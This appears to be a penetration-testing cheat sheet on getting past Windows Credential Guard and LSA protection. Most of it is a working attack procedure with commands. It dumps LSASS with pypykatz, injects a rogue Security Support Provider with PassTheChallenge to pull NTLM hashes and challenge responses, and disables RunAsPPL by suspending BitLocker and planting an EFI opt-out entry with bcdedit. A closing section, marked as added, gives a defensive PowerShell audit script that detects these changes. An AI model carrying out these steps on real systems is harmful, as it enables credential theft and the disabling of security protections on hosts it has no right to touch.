
Credential Guard & RunAsPPL

Registering a new Security Support Provider

We can create a new SSP that hooks into LSA and communicates with LSAIso. Use ly4k/PassTheChallenge to obtain NTLMv1 (nthash) or NTLMv2 (challenge) output from Credential Guard-isolated MSV via an injected SSP.

  1. Dump LSASS with the modified version of pypykatz:

    ```bash
    python3 -m pypykatz lsa minidump lsass.dmp -p msv
    ```

    For each interesting `== MSV ==` block, record the Context Handle, Proxy Info, and Encrypted blob (hex). Format addresses as `<ContextHandle>:<ProxyInfo>` (same style as the tool examples).

  2. Inject the SSP on the live target (still as SYSTEM / equivalent):

    ```powershell
    .\PassTheChallenge.exe inject
    # or: .\PassTheChallenge.exe inject 'C:\path\SecurityPackage.dll'
    ```

  3. Confirm the RPC server:

    ```powershell
    .\PassTheChallenge.exe ping
    ```

  4. Choose an output path:

    • NTLMv1-oriented / "NTHASH" line (README `nthash`; optional 8-byte server challenge, else default `1122334455667788`):

      ```powershell
      .\PassTheChallenge.exe nthash <ContextHandle>:<ProxyInfo> <EncryptedBlobHEX>
      ```

    • NTLMv2 response (README `challenge`; IFCR "pass the challenge" against a real server challenge). Supply the blob and a server-challenge string exactly as the tool expects: `<UTF16_HEX_domain>:<UTF16_HEX_username>:<HEX_server_name>:<HEX_server_challenge>`

      ```powershell
      .\PassTheChallenge.exe challenge <ContextHandle>:<ProxyInfo> <EncryptedBlobHEX> <UTF16_HEX_domain>:<UTF16_HEX_username>:<HEX_server_name>:<HEX_server_challenge>
      ```

Background: Defeating Credential Guard and IFCR Pass-the-Challenge.

Disable LSA protection

If Credential Guard is not running and you want to dump LSASS, deactivate RunAsPPL. If Secure Boot is enabled, you also have to disable LSA protection (Microsoft docs):

  1. Check if RunAsPPL is active:

    ```powershell
    Get-WinEvent -LogName System -MaxEvents 500 |
      Where-Object { $_.ProviderName -eq 'Microsoft-Windows-Wininit' -and $_.Id -eq 12 } |
      Select-Object -First 3 TimeCreated, Message |
      Format-List
    ```

  2. Suspend BitLocker:

    ```powershell
    Suspend-BitLocker -MountPoint C: -RebootCount 2
    ```

  3. Download LsaPpl Opt-Out for your architecture.

  4. Mount the EFI partition and copy the opt-out package (use the same drive letter in every command):

    ```cmd
    mountvol Z: /s
    copy C:\LsaPplConfig.efi Z:\EFI\Microsoft\Boot\LsaPplConfig.efi /Y

    bcdedit /create {b5ca5172-7d7b-4c9e-9d3b-3d4a4f7d2c10} /d "LsaPpl Opt-Out" /application osloader
    bcdedit /set    {b5ca5172-7d7b-4c9e-9d3b-3d4a4f7d2c10} path "\EFI\Microsoft\Boot\LsaPplConfig.efi"
    bcdedit /set    {b5ca5172-7d7b-4c9e-9d3b-3d4a4f7d2c10} device partition=Z:
    bcdedit /set    {bootmgr} bootsequence {b5ca5172-7d7b-4c9e-9d3b-3d4a4f7d2c10}

    mountvol Z: /d
    ```
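An added audit script (not from this page and not part of the PassTheChallenge project) that checks, from the defender's side, what both sections above hinge on: whether RunAsPPL is configured and actually took effect at this boot, whether Credential Guard is running, and which security packages are registered or were loaded after boot. The security-package baseline is an assumption; compare it against a known-good host of the same build.

```powershell
# Added audit script (not from the original page). Run elevated on the host under review.
$lsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$lsa    = Get-ItemProperty -Path $lsaKey

# 1. RunAsPPL as configured (1 = enabled with UEFI lock, 2 = enabled without UEFI lock)
$runAsPpl = $lsa.RunAsPPL
"RunAsPPL configured : $(if ($null -eq $runAsPpl) { 'not set' } else { $runAsPpl })"

# 2. RunAsPPL as actually applied at this boot: Wininit event 12 in the System log
#    ('LSASS.exe was started as a protected process'). Restrict to the current boot,
#    because an LsaPplConfig.efi opt-out leaves the registry value untouched.
$boot = (Get-CimInstance -ClassName Win32_OperatingSystem).LastBootUpTime
$ppl  = Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Microsoft-Windows-Wininit'; Id = 12; StartTime = $boot } -ErrorAction SilentlyContinue
"RunAsPPL effective  : $([bool]$ppl)"
if ($runAsPpl -ge 1 -and -not $ppl) {
  Write-Warning 'RunAsPPL is configured but LSASS did not start protected this boot (opt-out applied?)'
}

# 3. Credential Guard state from Win32_DeviceGuard (SecurityServicesRunning: 1 = Credential Guard, 2 = HVCI)
$dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard
"Credential Guard    : configured=$($dg.SecurityServicesConfigured -contains 1) running=$($dg.SecurityServicesRunning -contains 1)"

# 4. Persistently registered SSPs ('Security Packages' under Lsa and Lsa\OSConfig).
#    The baseline below is an assumption; adjust it for the build you are auditing.
$baseline = @('""', 'kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u')
foreach ($key in $lsaKey, "$lsaKey\OSConfig") {
  $pkgs = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'Security Packages'
  foreach ($p in @($pkgs)) {
    if ($p -and $baseline -notcontains $p) { Write-Warning "Unexpected security package '$p' in $key" }
  }
}

# 5. Packages added at runtime (AddSecurityPackage) never touch the registry. With
#    'Audit Security System Extension' enabled they appear as Security event 4622;
#    anything logged well after boot (here: > 5 minutes, a heuristic) deserves a look.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4622; StartTime = $boot.AddMinutes(5) } -ErrorAction SilentlyContinue |
  Select-Object TimeCreated, Message | Format-List
```

A configured-but-not-effective RunAsPPL, or a 4622 event long after boot, is the signal to pull LSASS memory and the EFI partition for closer inspection.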